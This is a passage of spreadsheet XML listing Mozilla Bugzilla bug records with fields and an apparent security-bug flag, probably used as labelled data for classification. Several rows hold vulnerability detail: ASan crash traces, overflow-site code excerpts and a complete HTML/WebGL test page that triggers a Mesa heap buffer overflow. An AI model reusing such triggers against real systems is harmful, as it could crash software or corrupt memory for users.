        <v>866544</v>
      </c>
      <c r="B4351" t="inlineStr">
        <is>
          <t>2013-04-28 14:54:32 -0700</t>
        </is>
      </c>
      <c r="C4351" t="inlineStr">
        <is>
          <t>[Mac] Buffer overflow of nsAutoTArray "breakState"</t>
        </is>
      </c>
      <c r="D4351" t="inlineStr">
        <is>
          <t>2013-11-25 16:40:48 -0800</t>
        </is>
      </c>
      <c r="E4351" t="n">
        <v>1</v>
      </c>
      <c r="F4351" t="n">
        <v>1</v>
      </c>
      <c r="G4351" t="n">
        <v>3</v>
      </c>
      <c r="H4351" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I4351" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J4351" t="inlineStr">
        <is>
          <t>Internationalization</t>
        </is>
      </c>
      <c r="K4351" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L4351" t="inlineStr">
        <is>
          <t>x86_64</t>
        </is>
      </c>
      <c r="M4351" t="inlineStr">
        <is>
          <t>macOS</t>
        </is>
      </c>
      <c r="N4351" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O4351" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4351" t="inlineStr">
        <is>
          <t>[adv-main21+][adv-esr1706+]</t>
        </is>
      </c>
      <c r="Q4351" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R4351" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S4351" t="inlineStr">
        <is>
          <t>mozilla23</t>
        </is>
      </c>
      <c r="T4351" t="n">
        <v>1</v>
      </c>
      <c r="U4351" t="n">
        <v>0</v>
      </c>
      <c r="V4351" t="n">
        <v>21</v>
      </c>
      <c r="W4351" t="inlineStr">
        <is>
          <t>Created attachment 742850
testcase (EVEN "VIEW SOURCE" CRASHES)
WRITE of size 1 at 0x7fff5fbceb70 thread T0
    #0 0x1088d76c2 in NS_GetComplexLineBreaks [nsCarbonBreaker.cpp:36]
    #1 0x1088bf7a0 in nsJISx4051LineBreaker::GetJISx4051Breaks [nsJISx4051LineBreaker.cpp:856]
    #2 0x10baeacbe in nsLineBreaker::FlushCurrentWord [nsLineBreaker.cpp:77]
    ...
nsLineBreaker::FlushCurrentWord:
   nsAutoTArray&lt;uint8_t,4000&gt; breakState;
   ...
   GetJISx4051Breaks(..., breakState.Elements());
nsCarbonBreaker.cpp:
   UCFindTextBreak(..., &amp;offset);
   ...
   aBreakBefore[offset] = true;</t>
        </is>
      </c>
      <c r="X4351" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="4352">
      <c r="A4352" t="n">
        <v>279589</v>
      </c>
      <c r="B4352" t="inlineStr">
        <is>
          <t>2005-01-24 06:03:17 -0800</t>
        </is>
      </c>
      <c r="C4352" t="inlineStr">
        <is>
          <t>Documentation suggests ISO-8859-1 encoding, but template files are UTF-8</t>
        </is>
      </c>
      <c r="D4352" t="inlineStr">
        <is>
          <t>2007-11-29 00:39:29 -0800</t>
        </is>
      </c>
      <c r="E4352" t="n">
        <v>1</v>
      </c>
      <c r="F4352" t="n">
        <v>1</v>
      </c>
      <c r="G4352" t="n">
        <v>4</v>
      </c>
      <c r="H4352" t="inlineStr">
        <is>
          <t>Server Software</t>
        </is>
      </c>
      <c r="I4352" t="inlineStr">
        <is>
          <t>Bugzilla</t>
        </is>
      </c>
      <c r="J4352" t="inlineStr">
        <is>
          <t>Documentation</t>
        </is>
      </c>
      <c r="K4352" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L4352" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M4352" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N4352" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O4352" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4352" t="inlineStr"/>
      <c r="Q4352" t="inlineStr">
        <is>
          <t>P3</t>
        </is>
      </c>
      <c r="R4352" t="inlineStr">
        <is>
          <t>trivial</t>
        </is>
      </c>
      <c r="S4352" t="inlineStr">
        <is>
          <t>Bugzilla 2.18</t>
        </is>
      </c>
      <c r="T4352" t="n">
        <v>1</v>
      </c>
      <c r="U4352" t="n">
        <v>1</v>
      </c>
      <c r="V4352" t="n">
        <v>8</v>
      </c>
      <c r="W4352" t="inlineStr">
        <is>
          <t>User-Agent:       Mozilla/5.0 (X11; U; Linux i686; fr-FR; rv:1.7.5) Gecko/20041111 Firefox/1.0
Build Identifier: Mozilla/5.0 (X11; U; Linux i686; fr-FR; rv:1.7.5) Gecko/20041111 Firefox/1.0
The Bugzilla documentation recommends the English speakers to enforce the use of
ISO-8859-1 as the default charset by editing Bugzilla/CGI.pm yet the template
files in Bugzilla 2.18 are encoded in UTF-8.
Is the documentation up to date ?
Reproducible: Always
Steps to Reproduce:
1. Go to http://www.bugzilla.org/docs/2.18/html/security-bugzilla.htm
2. Read page content
3.
Expected Results:  
All users should be recommended to use UTF-8 as default charset.</t>
        </is>
      </c>
      <c r="X4352" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="4353">
      <c r="A4353" t="n">
        <v>1033396</v>
      </c>
      <c r="B4353" t="inlineStr">
        <is>
          <t>2014-07-02 07:45:48 -0700</t>
        </is>
      </c>
      <c r="C4353" t="inlineStr">
        <is>
          <t>"Sorry, you are currently offline. Please try again later." message is displayed when trying to install an app on -dev.</t>
        </is>
      </c>
      <c r="D4353" t="inlineStr">
        <is>
          <t>2014-07-04 00:53:42 -0700</t>
        </is>
      </c>
      <c r="E4353" t="n">
        <v>1</v>
      </c>
      <c r="F4353" t="n">
        <v>1</v>
      </c>
      <c r="G4353" t="n">
        <v>6</v>
      </c>
      <c r="H4353" t="inlineStr">
        <is>
          <t>Graveyard</t>
        </is>
      </c>
      <c r="I4353" t="inlineStr">
        <is>
          <t>Marketplace Graveyard</t>
        </is>
      </c>
      <c r="J4353" t="inlineStr">
        <is>
          <t>Consumer Pages</t>
        </is>
      </c>
      <c r="K4353" t="inlineStr">
        <is>
          <t>1.5</t>
        </is>
      </c>
      <c r="L4353" t="inlineStr">
        <is>
          <t>x86_64</t>
        </is>
      </c>
      <c r="M4353" t="inlineStr">
        <is>
          <t>Windows 7</t>
        </is>
      </c>
      <c r="N4353" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O4353" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4353" t="inlineStr"/>
      <c r="Q4353" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R4353" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S4353" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T4353" t="n">
        <v>1</v>
      </c>
      <c r="U4353" t="n">
        <v>0</v>
      </c>
      <c r="V4353" t="n">
        <v>8</v>
      </c>
      <c r="W4353" t="inlineStr">
        <is>
          <t>Prerequisites:
Build identifier: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0
Steps to reproduce:
1.Open MP-dev and try to install a free app
Expected results:
App is successfully installed
Actual results:
App is not installed and after a while , the "Sorry, you are currently offline. Please try again later." message is displayed 
Please see screencast for this bug : http://screencast.com/t/AEXVmFbIHa
NOTES:
Reproducible also on FFOS 1.4 
Not reproducible on Stage
I can see this in my console :
[model] Found app with lookup key test-app-ram6787
include...3448593 (line 6)
[buttons] Install requested for Test App (ram6787)
include...3448593 (line 6)
[buttons] Starting app installation for Test App (ram6787)
include...3448593 (line 6)
[tracking][helpers] No associated search term to track.
include...3448593 (line 6)
[buttons] Receipt not required (skipping record step) for Test App (ram6787)
include...3448593 (line 6)
[installer] Using iframe installer for http://ram6787.testmanifest.com/manifest.webapp
include...3448593 (line 6)
[iframe-install] Received message: {"name":"install-package","data":{"product":{"author":"Gregory Koberger","banner_message":null,"banner_regions":[],"categories":["entertainment","business"],"content_ratings":{"body":"generic","rating":"3","interactives":[],"descriptors":[]},"current_version":"1.0","description":"This app has been automatically generated by &lt;a rel=\"nofollow\" href=\"https://outgoing-mkt-dev.allizom.org/v1/4818602cb1fca6d851bf5cc50f117f01a3696e964d279014202a46d6aa708b6d/http%3A//testmanifest.com\"&gt;testmanifest.com&lt;/a&gt;","device_types":["desktop","firefoxos"],"homepage":"http://google.com","icons":{"64":"https://marketplace-dev.mozflare.net/img/uploads/addon_icons/494/494750-64.png?modified=1201365f"},"id":494750,"is_offline":false,"is_packaged":false,"manifest_url":"http://ram6787.testmanifest.com/manifest.webapp","name":"Test App (ram6787)","payment_required":false,"premium_type":"free","previews":[{"id":137712,"image_url":"https://marketplace-dev.mozflare.net/img/uploads/previews/full/137/137712.png?modified=1402652104","thumbnail_url":"https://marketplace-dev.mozflare.net/img/uploads/previews/thumbs/137/137712.png?modified=1402652104"},{"id":137714,"image_url":"https://marketplace-dev.mozflare.net/img/uploads/previews/full/137/137714.png?modified=1402652104","thumbnail_url":"https://marketplace-dev.mozflare.net/img/uploads/previews/thumbs/137/137714.png?modified=1402652104"}],"price":null,"price_locale":null,"privacy_policy":"/api/v1/apps/app/494750/privacy/","public_stats":false,"release_notes":null,"ratings":{"count":0,"average":0},"slug":"test-app-ram6787","status":4,"support_email":"test@test.com","support_url":"http://youtube.com","upsell":false,"user":{"developed":false,"purchased":false,"installed":true},"__time":1404312196674,"receipt_required":false},"opt":{}}}
/iframe...l.html/ (line 35)
[iframe-install] message from https://marketplace-dev.allizom.org not allowed
/iframe...l.html/ (line 38)
[buttons] Spinner timeout for Test App (ram6787)</t>
        </is>
      </c>
      <c r="X4353" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="4354">
      <c r="A4354" t="n">
        <v>1256739</v>
      </c>
      <c r="B4354" t="inlineStr">
        <is>
          <t>2016-03-15 10:50:05 -0700</t>
        </is>
      </c>
      <c r="C4354" t="inlineStr">
        <is>
          <t>hunspell: stack-buffer-overflow write in [@SfxEntry::checkword]</t>
        </is>
      </c>
      <c r="D4354" t="inlineStr">
        <is>
          <t>2016-09-22 17:22:21 -0700</t>
        </is>
      </c>
      <c r="E4354" t="n">
        <v>1</v>
      </c>
      <c r="F4354" t="n">
        <v>1</v>
      </c>
      <c r="G4354" t="n">
        <v>3</v>
      </c>
      <c r="H4354" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I4354" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J4354" t="inlineStr">
        <is>
          <t>Spelling checker</t>
        </is>
      </c>
      <c r="K4354" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L4354" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M4354" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N4354" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O4354" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4354" t="inlineStr">
        <is>
          <t>[adv-main47+][adv-esr45.2+][post-critsmash-triage]</t>
        </is>
      </c>
      <c r="Q4354" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R4354" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S4354" t="inlineStr">
        <is>
          <t>mozilla49</t>
        </is>
      </c>
      <c r="T4354" t="n">
        <v>1</v>
      </c>
      <c r="U4354" t="n">
        <v>0</v>
      </c>
      <c r="V4354" t="n">
        <v>4</v>
      </c>
      <c r="W4354" t="inlineStr">
        <is>
          <t>Created attachment 8730824
call_stack.txt
Found in hunspell revision ded5b4c62c37084d216154e02e4d5e6efbd3ccfa
To reproduce:
run ./src/tools/example tests/base_utf.aff tests/base_utf.dic test_case.txt
==3565==ERROR: AddressSanitizer: stack-buffer-overflow on address 0x7f2f62c0052c at pc 0x0000005a6f8e bp 0x7ffe237dd790 sp 0x7ffe237dd788
WRITE of size 1 at 0x7f2f62c0052c thread T0
...</t>
        </is>
      </c>
      <c r="X4354" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="4355">
      <c r="A4355" t="n">
        <v>1172189</v>
      </c>
      <c r="B4355" t="inlineStr">
        <is>
          <t>2015-06-05 16:35:22 -0700</t>
        </is>
      </c>
      <c r="C4355" t="inlineStr">
        <is>
          <t>Overflow in XULContentSinkImpl::AddText causes memory-safety bug</t>
        </is>
      </c>
      <c r="D4355" t="inlineStr">
        <is>
          <t>2024-05-30 09:02:07 -0700</t>
        </is>
      </c>
      <c r="E4355" t="n">
        <v>1</v>
      </c>
      <c r="F4355" t="n">
        <v>1</v>
      </c>
      <c r="G4355" t="n">
        <v>3</v>
      </c>
      <c r="H4355" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I4355" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J4355" t="inlineStr">
        <is>
          <t>DOM: Core &amp; HTML</t>
        </is>
      </c>
      <c r="K4355" t="inlineStr">
        <is>
          <t>38 Branch</t>
        </is>
      </c>
      <c r="L4355" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M4355" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N4355" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O4355" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4355" t="inlineStr">
        <is>
          <t>[post-critsmash-triage][adv-main41+]</t>
        </is>
      </c>
      <c r="Q4355" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R4355" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S4355" t="inlineStr">
        <is>
          <t>mozilla41</t>
        </is>
      </c>
      <c r="T4355" t="n">
        <v>1</v>
      </c>
      <c r="U4355" t="n">
        <v>0</v>
      </c>
      <c r="V4355" t="n">
        <v>10</v>
      </c>
      <c r="W4355" t="inlineStr">
        <is>
          <t>User Agent: Mozilla/5.0 (Windows NT 5.1; rv:36.0) Gecko/20100101 Firefox/36.0
Build ID: 20150305021524
Steps to reproduce:
This bug is just like https://bugzilla.mozilla.org/show_bug.cgi?id=1172187 ,  but in XULContentSinkImpl::AddText (38.0.1\dom\xul\nsXULContentSink.cpp), line 1075:
1075:        mTextSize += aLength;
1076:        mText = (char16_t *) moz_realloc(mText, sizeof(char16_t) * mTextSize);</t>
        </is>
      </c>
      <c r="X4355" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="4356">
      <c r="A4356" t="n">
        <v>1582205</v>
      </c>
      <c r="B4356" t="inlineStr">
        <is>
          <t>2019-09-18 10:39:29 -0700</t>
        </is>
      </c>
      <c r="C4356" t="inlineStr">
        <is>
          <t>add wasm sandboxing configuration options</t>
        </is>
      </c>
      <c r="D4356" t="inlineStr">
        <is>
          <t>2019-09-21 03:14:01 -0700</t>
        </is>
      </c>
      <c r="E4356" t="n">
        <v>1</v>
      </c>
      <c r="F4356" t="n">
        <v>1</v>
      </c>
      <c r="G4356" t="n">
        <v>7</v>
      </c>
      <c r="H4356" t="inlineStr">
        <is>
          <t>Developer Infrastructure</t>
        </is>
      </c>
      <c r="I4356" t="inlineStr">
        <is>
          <t>Firefox Build System</t>
        </is>
      </c>
      <c r="J4356" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K4356" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L4356" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M4356" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N4356" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O4356" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4356" t="inlineStr"/>
      <c r="Q4356" t="inlineStr">
        <is>
          <t>P3</t>
        </is>
      </c>
      <c r="R4356" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S4356" t="inlineStr">
        <is>
          <t>mozilla71</t>
        </is>
      </c>
      <c r="T4356" t="n">
        <v>1</v>
      </c>
      <c r="U4356" t="n">
        <v>0</v>
      </c>
      <c r="V4356" t="n">
        <v>4</v>
      </c>
      <c r="W4356" t="inlineStr">
        <is>
          <t>This is the configuration part of bug 1576052, split out for easier landing.</t>
        </is>
      </c>
      <c r="X4356" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="4357">
      <c r="A4357" t="n">
        <v>1400536</v>
      </c>
      <c r="B4357" t="inlineStr">
        <is>
          <t>2017-09-16 04:02:12 -0700</t>
        </is>
      </c>
      <c r="C4357" t="inlineStr">
        <is>
          <t>Add an option for showing more / fewer rows in New Tab sections</t>
        </is>
      </c>
      <c r="D4357" t="inlineStr">
        <is>
          <t>2021-11-29 02:34:56 -0800</t>
        </is>
      </c>
      <c r="E4357" t="n">
        <v>1</v>
      </c>
      <c r="F4357" t="n">
        <v>1</v>
      </c>
      <c r="G4357" t="n">
        <v>2</v>
      </c>
      <c r="H4357" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I4357" t="inlineStr">
        <is>
          <t>Firefox</t>
        </is>
      </c>
      <c r="J4357" t="inlineStr">
        <is>
          <t>New Tab Page</t>
        </is>
      </c>
      <c r="K4357" t="inlineStr">
        <is>
          <t>57 Branch</t>
        </is>
      </c>
      <c r="L4357" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M4357" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N4357" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O4357" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4357" t="inlineStr">
        <is>
          <t>[blocked]</t>
        </is>
      </c>
      <c r="Q4357" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R4357" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S4357" t="inlineStr">
        <is>
          <t>Firefox 62</t>
        </is>
      </c>
      <c r="T4357" t="n">
        <v>1</v>
      </c>
      <c r="U4357" t="n">
        <v>0</v>
      </c>
      <c r="V4357" t="n">
        <v>17</v>
      </c>
      <c r="W4357" t="inlineStr">
        <is>
          <t>Created attachment 8908974
three-rows.png
User Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:57.0) Gecko/20100101 Firefox/57.0
Build ID: 20170915192121
Steps to reproduce:
Not sure if its been requested previosly, but the option of having another Row would be nice (since we can't modify the column/row options anymore)
Actual results:
Able to select between 2 or 3 rows as an option if the user wishes
Expected results:
Attached is a sample of how the design would be</t>
        </is>
      </c>
      <c r="X4357" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="4358">
      <c r="A4358" t="n">
        <v>746896</v>
      </c>
      <c r="B4358" t="inlineStr">
        <is>
          <t>2012-04-18 23:47:21 -0700</t>
        </is>
      </c>
      <c r="C4358" t="inlineStr">
        <is>
          <t>Crash in _cairo_surface_snapshot_copy_on_write during CC after printing a large canvas</t>
        </is>
      </c>
      <c r="D4358" t="inlineStr">
        <is>
          <t>2012-07-24 16:19:53 -0700</t>
        </is>
      </c>
      <c r="E4358" t="n">
        <v>1</v>
      </c>
      <c r="F4358" t="n">
        <v>1</v>
      </c>
      <c r="G4358" t="n">
        <v>3</v>
      </c>
      <c r="H4358" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I4358" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J4358" t="inlineStr">
        <is>
          <t>Graphics</t>
        </is>
      </c>
      <c r="K4358" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L4358" t="inlineStr">
        <is>
          <t>x86_64</t>
        </is>
      </c>
      <c r="M4358" t="inlineStr">
        <is>
          <t>Linux</t>
        </is>
      </c>
      <c r="N4358" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O4358" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4358" t="inlineStr">
        <is>
          <t>[sg:critical][advisory-tracking+]</t>
        </is>
      </c>
      <c r="Q4358" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R4358" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S4358" t="inlineStr">
        <is>
          <t>mozilla16</t>
        </is>
      </c>
      <c r="T4358" t="n">
        <v>1</v>
      </c>
      <c r="U4358" t="n">
        <v>0</v>
      </c>
      <c r="V4358" t="n">
        <v>42</v>
      </c>
      <c r="W4358" t="inlineStr">
        <is>
          <t>Created attachment 616478
testcase
1. Set
  user_pref("gfx.canvas.azure.enabled", true);
2. Load the testcase.
3. Print the page (to PDF).
4. Quit Firefox.
Result: crash during a shutdown CC.
This might be the cause of bug 740325. I'm filing this separately because I'm not sure, and because the testcase demonstrates that it's a security bug.</t>
        </is>
      </c>
      <c r="X4358" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="4359">
      <c r="A4359" t="n">
        <v>805814</v>
      </c>
      <c r="B4359" t="inlineStr">
        <is>
          <t>2012-10-26 08:05:16 -0700</t>
        </is>
      </c>
      <c r="C4359" t="inlineStr">
        <is>
          <t>Mesa heap buffer overflow, exposed by WebGL, mirroring Chrome issue 145525</t>
        </is>
      </c>
      <c r="D4359" t="inlineStr">
        <is>
          <t>2016-12-01 13:38:26 -0800</t>
        </is>
      </c>
      <c r="E4359" t="n">
        <v>1</v>
      </c>
      <c r="F4359" t="n">
        <v>1</v>
      </c>
      <c r="G4359" t="n">
        <v>3</v>
      </c>
      <c r="H4359" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I4359" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J4359" t="inlineStr">
        <is>
          <t>Graphics: CanvasWebGL</t>
        </is>
      </c>
      <c r="K4359" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L4359" t="inlineStr">
        <is>
          <t>x86_64</t>
        </is>
      </c>
      <c r="M4359" t="inlineStr">
        <is>
          <t>Linux</t>
        </is>
      </c>
      <c r="N4359" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O4359" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4359" t="inlineStr">
        <is>
          <t>[adv-main18+][adv-esr17+]</t>
        </is>
      </c>
      <c r="Q4359" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R4359" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S4359" t="inlineStr">
        <is>
          <t>mozilla20</t>
        </is>
      </c>
      <c r="T4359" t="n">
        <v>1</v>
      </c>
      <c r="U4359" t="n">
        <v>0</v>
      </c>
      <c r="V4359" t="n">
        <v>38</v>
      </c>
      <c r="W4359" t="inlineStr">
        <is>
          <t>Created attachment 675567
Testcase
This is http://code.google.com/p/chromium/issues/detail?id=145525 originally reported by miaubiz.
VULNERABILITY DETAILS
heap buffer overflow in gpu process with webgl 
VERSION
Chrome Version: dev
Operating System: 64bit linux
REPRODUCTION CASE
&lt;html&gt;
  &lt;head&gt;
    &lt;script id="vshader" type="x-shader/x-vertex"&gt;
      attribute vec4 vPosition;
      void main()
      {
        gl_Position = vPosition;
      }
    &lt;/script&gt;
    &lt;script id="fshader" type="x-shader/x-fragment"&gt;
      precision mediump float;
      uniform float color[3];
      void main()
      {
        gl_FragColor = vec4(color[0], 0, 0, 0);
      }
    &lt;/script&gt;
    &lt;script&gt;
      function shader(gl, program, shaderType, shaderId) {
        var shaderSource = document.getElementById(shaderId).text
        var shader = gl.createShader(shaderType);
        gl.shaderSource(shader, shaderSource);
        gl.compileShader(shader);
        gl.attachShader(program, shader)
      }
      function loadProgram(gl) {
        var program = gl.createProgram();
        shader(gl, program, gl.VERTEX_SHADER, "vshader")
        shader(gl, program, gl.FRAGMENT_SHADER, "fshader")
        gl.linkProgram(program);
        return program;
      }
      var gl = document.createElement('canvas').getContext('experimental-webgl')
      var program = loadProgram(gl)
      var elemLoc = gl.getUniformLocation(program, "color[2]");
      var value = gl.getUniform(program, elemLoc);
    &lt;/script&gt;
  &lt;/head&gt;
  &lt;body&gt;
  &lt;/body&gt;
&lt;/html&gt;
FOR CRASHES, PLEASE INCLUDE THE FOLLOWING ADDITIONAL INFORMATION
Type of crash: gpu + asan
Crash State: 
==21671== ERROR: AddressSanitizer heap-buffer-overflow on address 0x7fffe06962b8 at pc 0x55555f2a4226 bp 0x7fffffff7b20 sp 0x7fffffff78e8
WRITE of size 1 at 0x7fffe06962b8 thread T0
    #0 0x55555f2a4225 in __interceptor_memcpy ??:0
    #1 0x7fffe967640b in ?? ??:0
0x7fffe06962b8 is located 4 bytes to the right of 52-byte region [0x7fffe0696280,0x7fffe06962b4)
allocated by thread T0 here:
    #0 0x55555f2a78e1 in __interceptor_calloc ??:0
    #1 0x7fffe74936f7 in ?? ??:0</t>
        </is>
      </c>
      <c r="X4359" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="4360">
      <c r="A4360" t="n">
        <v>1119347</v>
      </c>
      <c r="B4360" t="inlineStr">
        <is>
          <t>2015-01-08 09:32:35 -0800</t>
        </is>
      </c>
      <c r="C4360" t="inlineStr">
        <is>
          <t>Admin creation of API tokens</t>
        </is>
      </c>
      <c r="D4360" t="inlineStr">
        <is>
          <t>2015-01-16 14:01:59 -0800</t>
        </is>
      </c>
      <c r="E4360" t="n">
        <v>1</v>
      </c>
      <c r="F4360" t="n">
        <v>1</v>
      </c>
      <c r="G4360" t="n">
        <v>4</v>
      </c>
      <c r="H4360" t="inlineStr">
        <is>
          <t>Server Software</t>
        </is>
      </c>
      <c r="I4360" t="inlineStr">
        <is>
          <t>Socorro</t>
        </is>
      </c>
      <c r="J4360" t="inlineStr">
        <is>
          <t>Webapp</t>
        </is>
      </c>
      <c r="K4360" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L4360" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M4360" t="inlineStr">
        <is>
          <t>macOS</t>
        </is>
      </c>
      <c r="N4360" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O4360" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4360" t="inlineStr"/>
      <c r="Q4360" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R4360" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S4360" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T4360" t="n">
        <v>1</v>
      </c>
      <c r="U4360" t="n">
        <v>0</v>
      </c>
      <c r="V4360" t="n">
        <v>13</v>
      </c>
      <c r="W4360" t="inlineStr">
        <is>
          <t>At the moment, users who have permissions have the ability to generate API tokens. They are specifically, and without any choice, set to expire in 3 months. 
We need longer lasting keys than that. These are to be used for things like RelEng that needs a token in their scripts for uploading symbols. It would be very unpractical if they have to create a new one every 3 months. 
We can either...
1) Change the form where you create an API token to allow you to specify expiration
1b) Make this choice depend on permissions or user roles you have (e.g. only superusers can create these)
2) Replicate much of the token creation stuff into the superuser-only admin area where you can create a token on behalf of another user (e.g. Ted creates one for releng@mozilla.com) with control on the expiration date. 
I'm happy to take this one but I'd love some feedback from you guys on the choice mentioned above.</t>
        </is>
      </c>
      <c r="X4360" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="4361">
      <c r="A4361" t="n">
        <v>846615</v>
      </c>
      <c r="B4361" t="inlineStr">
        <is>
          <t>2013-02-28 19:37:42 -0800</t>
        </is>
      </c>
      <c r="C4361" t="inlineStr">
        <is>
          <t>Valgrind warning about use after free in SocketAcceptTask</t>
        </is>
      </c>
      <c r="D4361" t="inlineStr">
        <is>
          <t>2014-11-19 19:48:28 -0800</t>
        </is>
      </c>
      <c r="E4361" t="n">
        <v>1</v>
      </c>
      <c r="F4361" t="n">
        <v>1</v>
      </c>
      <c r="G4361" t="n">
        <v>3</v>
      </c>
      <c r="H4361" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I4361" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J4361" t="inlineStr">
        <is>
          <t>DOM: Device Interfaces</t>
        </is>
      </c>
      <c r="K4361" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L4361" t="inlineStr">
        <is>
          <t>ARM</t>
        </is>
      </c>
      <c r="M4361" t="inlineStr">
        <is>
          <t>Gonk (Firefox OS)</t>
        </is>
      </c>
      <c r="N4361" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O4361" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4361" t="inlineStr">
        <is>
          <t>[adv-main22+]</t>
        </is>
      </c>
      <c r="Q4361" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R4361" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S4361" t="inlineStr">
        <is>
          <t>mozilla22</t>
        </is>
      </c>
      <c r="T4361" t="n">
        <v>1</v>
      </c>
      <c r="U4361" t="n">
        <v>0</v>
      </c>
